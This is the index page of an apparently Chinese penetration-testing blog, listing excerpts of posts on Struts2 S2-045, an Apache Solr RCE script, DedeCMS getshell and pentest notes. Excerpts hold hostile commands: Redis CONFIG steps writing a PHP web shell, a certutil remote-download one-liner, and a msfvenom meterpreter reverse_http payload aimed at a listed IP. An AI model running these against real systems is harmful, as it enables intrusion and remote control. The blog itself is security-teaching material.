tusk1'Blog


  • 首页

  • 归档

  • 标签

  • 分类

  • 关于

struts2漏洞分析之S2-045

发表于 2020-03-14 | 分类于 web安全 , 代码审计
简介影响版本:2.3.31-2.3.5 2.5-2.5.10.1 漏洞原因:在处理上传文件的方法中,content-type中存在payload,处理错误并捕捉了异常信息(里面带有payload),后又OGNL解析 调试分析在获取action mapper前会对HttpServletReques ...
阅读全文 »

Apache_Solr_RCE利用脚本

发表于 2019-11-09 | 分类于 渗透测试
Apache_Solr_RCE_via_Velocity最近Apache Solr爆出了一个RCE 0day漏洞,利用前提是存在未授权访问。原作者给出的POC如下:12345678910111213141516171819202122232425262728293031323334353637383 ...
阅读全文 »

渗透测试笔记6-redis写shell

发表于 2019-10-03 | 分类于 渗透测试
通过备份文件写shell1234567CONFIG SET dir /var/www/html CONGIG SET dbfilename shell.php SET shell "<?php system($_GET['cmd']);?>" ...
阅读全文 »

渗透测试笔记5-一句话下载payload

发表于 2019-10-03 | 分类于 渗透测试
certutilCertutil.exe是一个命令行程序,作为证书服务的一部分安装。您可以使用Certutil.exe转储 和显示证书颁发机构(CA)配置信息,配置证书服务,备份和还原CA组件以及验证证书, 密钥对和证书链 下载默认下载后为bin文件,但不影响执行certutil.exe -urlc ...
阅读全文 »

渗透测试笔记4-msfvenom命令记录

发表于 2019-10-03 | 分类于 渗透测试
有效命令msfvenom -p windows/x64/meterpreter/reverse_http lhost=114.116.33.191 lport=8888 -f exe>test_3.exemsfvenom -p windows/meterpreter/reverse_http ...
阅读全文 »

渗透测试笔记3-内网存活主机扫描

发表于 2019-10-03 | 分类于 渗透测试
基于UDP简介UDP(User Datagram Protocol)是一种无连接的协议,在第四层-传输层,处于IP协议的 上一层。UDP有不提供数据包分组、组装和不能对数据包进行排序的缺点,也就是说,当报 文发送之后,是无法得知其是否安全完整到达的。 UDP特性:1.UDP 缺乏可靠性。UDP 本身 ...
阅读全文 »

渗透测试笔记2-MSF常用模块记录

发表于 2019-10-03 | 分类于 渗透测试
运行自动化脚本 msfconsole -r auto.rc 检测是否为虚拟机 post/windows/gather/checkvm 获取磁盘信息 windows/gather/forensics/enum_drives 补丁信息 run post/windows/gather/ ...
阅读全文 »

渗透测试笔记1-Meterpreter后渗透

发表于 2019-10-03 | 分类于 渗透测试
基本命令background将meterpreter终端隐藏在后台,msf可执行其它任务. sessions查看已获取的会话,sessions -i 与某对话交互 quit关闭当前会话,返回msf终端 shell获取系统的控制台shell reboot重新启动受害人的计算机 irb与ruby终端交互 ...
阅读全文 »

DeDecms v5.7 sp2 CRSF+文件操作 前台getshell

发表于 2019-05-12 | 分类于 web安全 , 代码审计
在plus/search.php中:123456789101112131415161718192021222324252627282930313233if(empty($typeid)){ $typenameCacheFile = DEDEDATA.'/cache/type ...
阅读全文 »

VulnHub-Acid Server Writeup

发表于 2019-04-26 | 分类于 渗透测试
目标Escalate the privileges to root and capture the flag. Once anyone able to beat the machine then please let me know. 信息收集端口扫描 nmap -p 1-65535 -T4 -A ...
阅读全文 »
123
tusk1

tusk1

奋斗、寻觅,而不屈服

24 日志
5 分类
11 标签
RSS
QQ E-Mail
© 2018 — 2020 tusk1
由 Hexo 强力驱动
|
主题 — NexT.Gemini v5.1.4